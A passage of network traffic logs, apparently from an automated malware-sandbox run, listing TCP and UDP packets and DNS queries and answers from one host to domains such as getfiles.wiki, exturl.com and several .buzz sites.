Jun 12, 2023 19:07:06.086308956 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.127801895 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.127835989 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.168842077 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.268394947 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.268501043 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.268610954 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.287342072 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.287390947 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.308799982 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.308866024 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.308991909 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.309348106 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.309376955 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.358010054 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.358392000 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.358439922 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.359154940 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.359656096 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.359814882 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.359857082 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.400301933 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.537899971 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.901855946 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.902149916 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:06.902352095 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.905241966 CEST	49704	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:06.905291080 CEST	443	49704	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:07.014100075 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:07.014157057 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:07.014242887 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:07.014564991 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:07.014595032 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:08.587152004 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.587275982 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.587428093 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.587678909 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.587723017 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.651583910 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.652079105 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.652147055 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.653482914 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.653620958 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.685687065 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.686101913 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.739059925 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:08.739108086 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:08.839085102 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:09.141983032 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.142335892 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.142390966 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.143632889 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.143726110 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.148638010 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.148777962 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.148808956 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.189049959 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.189080954 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.230061054 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.480037928 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.480314970 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.480408907 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.481122017 CEST	49705	443	192.168.2.3	173.231.16.76
Jun 12, 2023 19:07:09.481148005 CEST	443	49705	173.231.16.76	192.168.2.3
Jun 12, 2023 19:07:09.487535000 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.487605095 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.487716913 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.489054918 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.489082098 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.496875048 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.496918917 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.497014999 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.497488976 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.497514963 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.545849085 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.554102898 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.572499037 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.572540998 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.572901011 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.572928905 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.573576927 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.574116945 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.575056076 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.575232983 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.575622082 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.575841904 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:09.575902939 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.616056919 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:09.620292902 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.109661102 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.109812021 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.109895945 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:10.109925985 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.109956980 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.110004902 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:10.110083103 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.110327005 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.110390902 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:10.113730907 CEST	49708	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:10.113771915 CEST	443	49708	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:10.171068907 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.171139002 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.171274900 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.171442032 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.171456099 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.178792000 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.178841114 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.178934097 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.179146051 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.179168940 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.416156054 CEST	49712	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.416230917 CEST	443	49712	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.416302919 CEST	49712	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.416738033 CEST	49712	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.416759014 CEST	443	49712	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.455007076 CEST	443	49712	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.455666065 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.455720901 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.455809116 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.456115961 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.456140041 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.582926035 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.583972931 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.584007025 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.586030960 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.586123943 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.595077991 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.606292009 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.606340885 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.607240915 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.607377052 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.607410908 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.607517958 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.608830929 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.608963013 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.638641119 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.638917923 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.639250994 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.639280081 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.648248911 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.648313046 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.680155039 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.688198090 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.769505978 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.769638062 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.769750118 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.770349026 CEST	49711	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.770382881 CEST	443	49711	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.784701109 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.785099983 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.785140038 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.786606073 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.786700964 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.792959929 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.793066978 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.793164968 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.793668032 CEST	49709	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:10.793689966 CEST	443	49709	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:10.796809912 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.796999931 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.797036886 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.838231087 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.838341951 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.879298925 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.901192904 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.901377916 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.901464939 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.902066946 CEST	49713	443	192.168.2.3	149.56.240.132
Jun 12, 2023 19:07:10.902091026 CEST	443	49713	149.56.240.132	192.168.2.3
Jun 12, 2023 19:07:10.942887068 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:10.942980051 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:10.943070889 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:10.944019079 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:10.944061041 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.003345013 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.003750086 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.003813982 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.006048918 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.006236076 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.021665096 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.021869898 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.021893978 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.021979094 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.063218117 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.063268900 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.103220940 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.272942066 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.273003101 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.273094893 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.273135900 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.273158073 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.273202896 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.316788912 CEST	49714	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.316858053 CEST	443	49714	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.391232967 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.391279936 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.391410112 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.391670942 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.391689062 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.445296049 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.445588112 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.445652008 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.448203087 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.448329926 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.475495100 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.475734949 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.475754023 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.475831032 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.541241884 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.541276932 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.707936049 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.708056927 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.714725018 CEST	49715	443	192.168.2.3	141.101.120.10
Jun 12, 2023 19:07:11.714767933 CEST	443	49715	141.101.120.10	192.168.2.3
Jun 12, 2023 19:07:11.733845949 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:11.780293941 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:12.039190054 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:12.039601088 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:12.039696932 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:12.039984941 CEST	49707	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:12.040019989 CEST	443	49707	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:12.064527035 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.064589977 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.064676046 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.064862967 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.064894915 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.126338959 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.126833916 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.126879930 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.128158092 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.128284931 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.141904116 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.142102957 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.142119884 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.182316065 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.182379961 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.222338915 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.279861927 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.279985905 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.280050993 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.280455112 CEST	49716	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.280474901 CEST	443	49716	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.281219959 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.281301022 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.281416893 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.281686068 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.281709909 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.336669922 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.337193966 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.337259054 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.337740898 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.338310003 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.338428974 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.338434935 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.380310059 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.439466953 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.497822046 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.497950077 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:12.498049974 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.498250961 CEST	49717	443	192.168.2.3	35.190.80.1
Jun 12, 2023 19:07:12.498276949 CEST	443	49717	35.190.80.1	192.168.2.3
Jun 12, 2023 19:07:18.633564949 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:18.633703947 CEST	443	49706	216.58.215.228	192.168.2.3
Jun 12, 2023 19:07:18.633817911 CEST	49706	443	192.168.2.3	216.58.215.228
Jun 12, 2023 19:07:19.775959015 CEST	49706	443	192.168.2.3	216.58.215.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 12, 2023 19:07:04.402245998 CEST	57990	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:04.412997007 CEST	52387	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:04.413042068 CEST	56924	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:04.436027050 CEST	53	57990	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:04.445125103 CEST	53	52387	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:04.454072952 CEST	53	56924	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:05.653156996 CEST	53975	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:05.688474894 CEST	53	53975	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:05.774899006 CEST	51139	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:05.807715893 CEST	53	51139	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:06.978832006 CEST	60582	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:07.012687922 CEST	53	60582	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:08.553077936 CEST	62050	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:08.573780060 CEST	53	62050	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:10.133701086 CEST	59636	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:10.133833885 CEST	55638	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:10.134012938 CEST	57704	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:10.168836117 CEST	53	59636	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:10.175575018 CEST	53	55638	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:10.391360998 CEST	65320	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:10.414721966 CEST	53	65320	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:10.906759977 CEST	60767	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:10.941492081 CEST	53	60767	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:11.352027893 CEST	53848	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:11.387252092 CEST	53	53848	8.8.8.8	192.168.2.3
Jun 12, 2023 19:07:12.046273947 CEST	57571	53	192.168.2.3	8.8.8.8
Jun 12, 2023 19:07:12.061003923 CEST	53	57571	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 12, 2023 19:07:04.402245998 CEST	192.168.2.3	8.8.8.8	0x5511	Standard query (0)	getfiles.wiki	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:04.412997007 CEST	192.168.2.3	8.8.8.8	0x20f5	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:04.413042068 CEST	192.168.2.3	8.8.8.8	0x4ab0	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:05.653156996 CEST	192.168.2.3	8.8.8.8	0x6fcd	Standard query (0)	exturl.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:05.774899006 CEST	192.168.2.3	8.8.8.8	0xbced	Standard query (0)	chrome.google.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:06.978832006 CEST	192.168.2.3	8.8.8.8	0xad6d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:08.553077936 CEST	192.168.2.3	8.8.8.8	0x982f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.133701086 CEST	192.168.2.3	8.8.8.8	0x5a1b	Standard query (0)	campaignkejfcv.buzz	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.133833885 CEST	192.168.2.3	8.8.8.8	0xe4ef	Standard query (0)	campaignkeepy.buzz	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.134012938 CEST	192.168.2.3	8.8.8.8	0x4199	Standard query (0)	s10.histats.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.391360998 CEST	192.168.2.3	8.8.8.8	0x74c7	Standard query (0)	s4.histats.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:10.906759977 CEST	192.168.2.3	8.8.8.8	0xb0b9	Standard query (0)	e.dtscout.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:11.352027893 CEST	192.168.2.3	8.8.8.8	0x7c88	Standard query (0)	t.dtscout.com	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:12.046273947 CEST	192.168.2.3	8.8.8.8	0xa54b	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 12, 2023 19:07:04.436027050 CEST	8.8.8.8	192.168.2.3	0x5511	No error (0)	getfiles.wiki		188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:04.436027050 CEST	8.8.8.8	192.168.2.3	0x5511	No error (0)	getfiles.wiki		188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:04.445125103 CEST	8.8.8.8	192.168.2.3	0x20f5	No error (0)	accounts.google.com		216.58.215.237	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:04.454072952 CEST	8.8.8.8	192.168.2.3	0x4ab0	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 12, 2023 19:07:04.454072952 CEST	8.8.8.8	192.168.2.3	0x4ab0	No error (0)	clients.l.google.com		172.217.168.14	A (IP address)	IN (0x0001)	false
Jun 12, 2023 19:07:05.688474894 CEST	8.8.8.8	192.168.2.3	0x6fcd	No error (0)	exturl.com		38.128.66.115	A (IP address)	IN (0x0001)	false
